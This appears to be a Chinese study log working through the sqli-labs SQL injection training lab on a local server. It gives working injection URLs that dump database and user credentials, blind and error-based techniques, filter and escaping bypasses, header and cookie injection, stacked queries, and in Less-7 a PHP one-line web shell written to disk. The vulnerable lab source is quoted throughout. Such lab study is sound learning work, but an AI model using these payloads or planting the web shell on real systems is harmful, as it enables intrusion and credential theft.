sqli-labs 刷题记录

参考：

MYSQL注入天书

此文尽量使用手工注入以加深对原理的理解，竭力避免了使用sqlmap或者脚本自动化注入等方式。

Page-1 (Basic Challenges)

Less-1 GET - Error based - Single quotes - String (基于错误的GET单引号字符型注入)

手动注入

进去之后发现让输入id，随便输一个数字id发现都可以正常回显，然后尝试注入

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1'

根据报错信息猜测原语句是用'$id'来处理的输入，故用'闭合即可。

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1' or 1=1--+

正常回显，故用order by爆出列数，发现有3列(4时报错)

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1' order by 4--+

然后开始爆库名

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+

发现security数据库，开始爆表名

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

爆users表里的列名

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

爆出表里的所有数据

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,2,group_concat(username,0x3a,password) from users--+

很好，我们终于达到了和不断直接输入?id=xxxxx相同的效果hhh😄

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

把传入的$id直接当作字符串拼接了进来，故只需要用'闭合掉前面的引号，然后用--+注释掉后面的语句即可完成注入

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

手动注入

输入?id=1'观察报错

根据报错猜测是未用''包裹$id，直接对输入进行拼接，故与less-1相比只需去掉数字后的'即可。

#尝试
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 or 1=1--+
#爆列数
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 4--+
#爆库名
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表名
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#爆列名
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users--+

源码分析

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

可以看到直接把$id拼接了进来。

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

手动注入

输入?id=1'观察报错

根据报错猜测原语句是('$id')，故只需用')来闭合即可。

#尝试
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')--+
#爆列数
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 4--+
#爆库名
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表名
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#爆列名
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,2,group_concat(username,0x3a,password) from users--+

源码分析

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

手动注入

还是输入?id=1'，发现能正常显示，故使用?id=1"进行尝试

根据报错猜测原语句是("$id")，故只需用")来闭合即可。

#尝试
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")--+
#爆列数
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 4--+
#爆库名
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表名
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#爆列名
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,2,group_concat(username,0x3a,password) from users--+

源码分析

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3" color="#FFFF00">';
	print_r(mysqli_error($con1));
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

与less-1一样用''对输入进行处理来拼接，不同的是输入正确后不在显示数据库信息，而报错信息却能正确回显，此处将使用多种方式完成注入，以通过此关来学习各种注入方法及函数利用。

布尔盲注

利用left()和length()函数获取版本号及库名

逐位进行字符对比，如果正确则能看到You are in...........正确显示，否则不能。

#爆版本号，我的数据库版本是10.4.11-MariaDB
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),1)=1--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),2)=10--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),15)='10.4.11-MariaDB'--+
#爆库长
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and length(database())=8--+
#爆库名，使用的数据库名称为security，先看第一位是不是大于a,然后逐位尝试
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(database(),1)>'a'--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(database(),8)='security'--+

利用substr()和ascii()函数获取表名

逐位对比，如果正确则能看到You are in...........正确显示，否则不能。

#爆表名，这里第一个表是emails，使用的数据库是security
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109--+

#爆出第一个字符后挨个爆破剩余字符，最后获取第一个表名，如果想获取第二个，只需要修改limit后的内容即可
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+

利用regexp()函数获取列名字

正则匹配，如果正确则能看到You are in...........正确显示，否则不能。

#看users中是否有以us开头的列名
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+
#看users中是否有以pass开头的列名
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^pass[a-z]' limit 0,1)--+

利用ord()和mid()函数获取users 表的内容

#第一个用户名为Dumb，此语句是看第一个用户名的第一个字符是否为D
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+

报错注入

MySQL ERROR 1267 (HY000)错误解决办法

利用floor(rand(0)*2)进行报错注入

http://127.0.0.1:8081/sqli-labs/Less-5/?id=-1'union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns  group by a--+

利用 double 数值类型超出范围进行报错注入

http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'union select (exp(~(select * FROM(SELECT USER())a))),2,3--+

利用 bigint 溢出进行报错注入

http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' union select (!(select * from (select user())x) - ~0),2,3--+

利用xpath 函数报错注入

http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+

http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) --+

利用数据的重复性

http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x--+

延时注入

http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as cur
rent) as tb1--+

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

手动注入

利用报错注入可以看到版本信息。

http://127.0.0.1:8081/sqli-labs/Less-6/?id=1"and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+--+

源码分析

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3"  color= "#FFFF00">';
	print_r(mysqli_error($con1));
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

用""来处理$id，不回显正常输出的信息。

Less-7 GET - Dump into outfile - String （导出文件GET字符型注入）

源码分析

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

可以看出是使用了((''))来处理输入。

手动注入

#测试是否存在注入
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1')) or 1=1--+
#将user,2,3写入文件uuu.txt中
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1'))UNION SELECT user(),2,3 into outfile "txt文件路径"--+
#将一句话木马写入进去
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1'))UNION SELECT '<?php @eval($_POST["attack"])?>',2,3 into outfile "php文件路径"--+

手动注入

#测试注入点
http://127.0.0.1:8081/sqli-labs/Less-8/?id=1'or 1=1--+
#布尔盲注
http://127.0.0.1:8081/sqli-labs/Less-8/?id=1' and left(version(),15)='10.4.11-MariaDB'--+

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysqli_error($con1));
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

这一关错误信息也不再回显，但可以通过是否出现You are in...........来实现布尔盲注。

手动注入

#时间盲注
#猜测数据库security
http://127.0.0.1:8081/sqli-labs/Less-9/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+
http://127.0.0.1:8081/sqli-labs/Less-9/?id=1'and If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysqli_error($con1));
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

输入被用""处理，其他与less-9相同。

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

手动注入

post接收参数

#万能，密码随意
admin'or 1=1#
#爆库名，密码随意
1admin'union select 1,database()#

源码分析

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

手动注入

#post传入
uname=1")or 1=1#&passwd=2

源码分析

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

手动注入

先用万能密码登录。

uname=1')or 1=1#&passwd=2

登录成功后便可以使用布尔盲注爆库等信息。

源码分析

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

手动注入

#万能密码
admin"or 1=1#
#报错注入
uname=admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submit=Submit

源码分析

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

手动注入

使用延时注入，正确直接登录成功，否则延时5s。

uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

源码分析

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

手动注入

使用延时注入，正确直接登录成功，否则延时5s。

uname=admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

源码分析

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

手动注入

#报错注入
uname=admin&passwd=11'and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&submit=Submit
#延时注入
uname=admin&passwd=11'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&submit=Submit

源码分析

function check_input($con1, $value)
{
	if(!empty($value))
	{
		// truncation (see comments)
		$value = substr($value,0,15);
	}

	// Stripslashes if magic quotes enabled
	if (get_magic_quotes_gpc())
	{
		$value = stripslashes($value);
	}

	// Quote if not a number
	if (!ctype_digit($value))
	{
		$value = "'" . mysqli_real_escape_string($con1, $value) . "'";
	}
	else
	{
		$value = intval($value);
	}
	return $value;
}

$uname=check_input($con1, $_POST['uname']);  
$passwd=$_POST['passwd'];

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

在less-17的check_input()中，对 username 进行各种转义的处理，所以此处不能使用username进行注入。

函数简介

addslashes() #函数返回在预定义字符之前添加反斜杠的字符串，如单引号（'），双引号（"），反斜杠（\），NULL。
stripslashes() #函数删除由 addslashes() 函数添加的反斜杠。
mysql_real_escape_string() #函数转义 SQL 语句中使用的字符串中的特殊字符,如\x00，\n，\r，\，'，"，\x1a。

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理，头部POST注入)

手动注入

利用抓包工具修改user-agent即可

'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

源码分析

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

对 uname 和 passwd 进行了 check_input()函数的处理，所以我们在输入uname 和passwd上进行注入是不行的，但可以利用insert。

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

手动注入

修改referer即可。

'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1

源码分析

$uname = check_input($con1, $_POST['uname']);
$passwd = check_input($con1, $_POST['passwd']);

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

手动注入

添加cookie即可

uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#

源码分析

$uname = check_input($con1, $_POST['uname']);
$passwd = check_input($con1, $_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

setcookie('uname', $cookee, time()+3600);

手动注入

对Cookie进行base64编码即可

Cookie：
uname=YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=

源码分析

function check_input($con1, $value)
	{
		if(!empty($value))
		{
			$value = substr($value,0,20); // truncation (see comments)
		}
		if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
		{
			$value = stripslashes($value);
		}
		if (!ctype_digit($value))   	// Quote if not a number
		{
			$value = '"' . mysqli_real_escape_string($con1, $value) . '"'; //添加了"
		}
		else
		{
			$value = intval($value);
		}
		return $value;
	}

setcookie('uname', base64_encode($row1['username']), time()+3600);

手动注入

与less-21一样需要base64编码

源码分析

function check_input($con1, $value)
	{
		if(!empty($value))
		{
			$value = substr($value,0,20); // truncation (see comments)
		}
		if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
		{
			$value = stripslashes($value);
		}
		if (!ctype_digit($value))   	// Quote if not a number
		{
			$value = "'" . mysqli_real_escape_string($con1, $value) . "'";//添加了'
		}
		else
		{
			$value = intval($value);
		}
		return $value;
	}

setcookie('uname', base64_encode($row1['username']), time()+3600);

Page-2 (Advanced Injections)

Less-23 GET - Error based - strip comments (基于错误的，过滤注释的GET型)

手动注入

#获取路径
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,@@basedir,'3
#获取数据库名
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3
#获取security中所有表名
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3
#获取users中所有列名
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),'3
#获取users中username这一列内容
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(username) from security.users limit 0,1),'3
#获取users中password这一列内容
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(password) from security.users limit 0,1),'3

#报错注入获取数据库名
http://127.0.0.1:8081/sqli-labs/Less-23/?id=1'or extractvalue(1,concat(0x7e,database())) or '1'='1

源码分析

$id=$_GET['id'];

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

过滤了#和--这两种注释符号。

Less - 24 Second Degree Injections Real treat -Store Injections (二次注入)

手动注入

注册一个账号为admin'#的账户

注册成功后在后台可以看到信息

用刚注册的账号登录并修改密码即可更改admin的密码

源码分析

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

Less-25 Trick with OR & AND (过滤了or和and)

绕过or和and过滤

（1）大小写变形 Or,OR,oR

（2）编码，hex，urlencode

（3）添加注释/*or*/

（4）利用符号 and=&& or=||

手动注入

http://127.0.0.1:8081/sqli-labs/Less-25/?id=1'||1=1--+ 
http://127.0.0.1:8081/sqli-labs/Less-25/?id=1'OOrr 1=1--+

源码分析

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}

手动注入

http://127.0.0.1:8081/sqli-labs/Less-25a/?id=-1 UNION select 1,@@basedir,3#

Less-26 Trick with comments and space (过滤了注释和空格的注入)

手动注入

我们可以用url编码进行绕过(这些编码在Windows下使用可能会出现问题)

%09 Tab键（水平）
%0a 新建一行
%0c 新的一页
%0d return 键
%0b Tab键（垂直）
%a0 空格

http://127.0.0.1:8081/sqli-labs/Less-26/?id=1'anandd(updatexml(1,concat(0x7e,(select @@version),0x7e),1));%00

源码分析

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us(过滤了空格和注释的盲注)

手动注入

不能报错注入，直接盲注即可

源码分析

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

less 27 GET - Error Based- All your UNION & SELECT belong to us (过滤了union和select的)

手动注入

http://127.0.0.1:8081/sqli-labs/Less-27/?id=1'and(uPdatexml(1,conCat(0x7e,(selEct @@version),0x7e),1));%00

源码分析

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out select
return $id;
}

手动注入

不能报错注入，直接盲注即可

源码分析

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out Select
return $id;
}

less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis (基于错误的，有括号的单引号字符型，过滤了union和select等的注入)

手动注入

双写绕过即可

源码分析

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
$id= preg_replace('/[--]/',"", $id);				//Strip out --.
$id= preg_replace('/[#]/',"", $id);					//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
//$id= preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out UNION & SELECT.
return $id;
}

less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于盲注的，有括号的单引号字符型，过滤了union和select等的注入

手动注入

双写绕过即可

源码分析

function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
//$id= preg_replace('/[--]/',"", $id);				//Strip out --.
//$id= preg_replace('/[#]/',"", $id);					//Strip out #.
//$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
//$id= preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out spaces.
return $id;
}

Less-29 基于WAF的一个错误

手动注入

注意要配好tomcat的相关环境

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1'union select 1,database(),3--+

手动注入

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1"union select 1,database(),3--+

Less-31 Protection with WAF

手动注入

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1")union select 1,database(),3--+

Less-32 Bypass addslashes()

宽字节注入

mysql 在使用 GBK 编码的时候，会认为两个字符为一个汉字，例如%aa%5c 就是一个汉字（前一个 ascii 码大于 128 才能到汉字的范围）。我们在过滤 ’ 的时候，往往利用的思路是将 ‘ 转换为 \’ （转换的函数或者思路会在每一关遇到的时候介绍）。因此我们在此想办法将 ‘ 前面添加的 \ 除掉，一般有两种思路：

（1）%df 吃掉 \ 具体的原因是 urlencode(‘\) = %5c%27，我们在%5c%27 前面添加%df，形成%df%5c%27，而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，此事%df%5c 就是一个汉字，%27 则作为一个单独的符号在外面，同时也就达到了我们的目的。

（2）将 \’ 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 的情况，后面的%5c 会被前面的%5c 给注释掉。这也是 bypass 的一种方法

手动注入

http://127.0.0.1:8081/sqli-labs/Less-32/?id=-1%df'union select 1,user(),3--+

源码分析

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}

Less-33 Bypass addslashes()

手动注入

http://127.0.0.1:8081/sqli-labs/Less-33/?id=-1%df'union select 1,user(),3--+

源码分析

function check_addslashes($string)
{
    $string= addslashes($string);    
    return $string;
}

Less-34 Bypass Add SLASHES

手动注入

Less-35 why care for addslashes()

手动注入

http://127.0.0.1:8081/sqli-labs/Less-35/?id=-1 union select 1,user(),3;--+

源码分析

function check_addslashes($string)
{
    $string = addslashes($string);
    return $string;
}

Less-36 Bypass MySQL Real Escape String

手动注入

http://127.0.0.1:8081/sqli-labs/Less-36/?id=-1%df'union select 1,database(),3--+
http://127.0.0.1:8081/sqli-labs/Less-36/?id=-1%EF%BF%BD'union select 1,user(),3--+

源码分析

function check_quotes($con1, $string)
{
    $string=mysqli_real_escape_string($con1, $string);    
    return $string;
}

Less-37- MySQL_real_escape_string

手动注入

用burp即可

源码分析

$uname = mysqli_real_escape_string($con1, $uname1);
$passwd= mysqli_real_escape_string($con1, $passwd1);

mysqli_query($con1, "SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Page-3 (Stacked Injections)

Less-38 stacked Query

手动注入

加入一条数据

http://127.0.0.1:8081/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values ('38','less38','hello')--+

Less-39 stacked Query Intiger type

手动注入

http://127.0.0.1:8081/sqli-labs/Less-39/?id=1;insert into users(id,username,password) values ('39','less39','hello')--+

手动注入

http://127.0.0.1:8081/sqli-labs/Less-40/?id=1'); insert into users(id,username, password) values ('40','less40','hello')--+

手动注入

http://127.0.0.1:8081/sqli-labs/Less-41/?id=1;insert into users(id,username,password) values ('41','less41','hello')--+

源码分析

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

Less-42 - Stacked Query error based

手动注入

username:admin

Password:c’;create table less42 like users–+

less43 POST -Error based -String -Stacked with tiwst(POST型基于错误的堆叠变形字符型注入)

手动注入

username:admin

Password:c’);create table less43 like users–+

手动注入

username:admin

Password:c’;create table less44 like users–+

less-45 基于报错的password处的’)闭合注入

手动注入

username:admin

Password:c’);create table less45 like users–+

less-46 ORDER BY-Error-Numeric

手动注入

#报错注入
http://127.0.0.1:8081/sqli-labs/Less-46/?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
#也可以导入导出文件into outfile 参数

源码分析

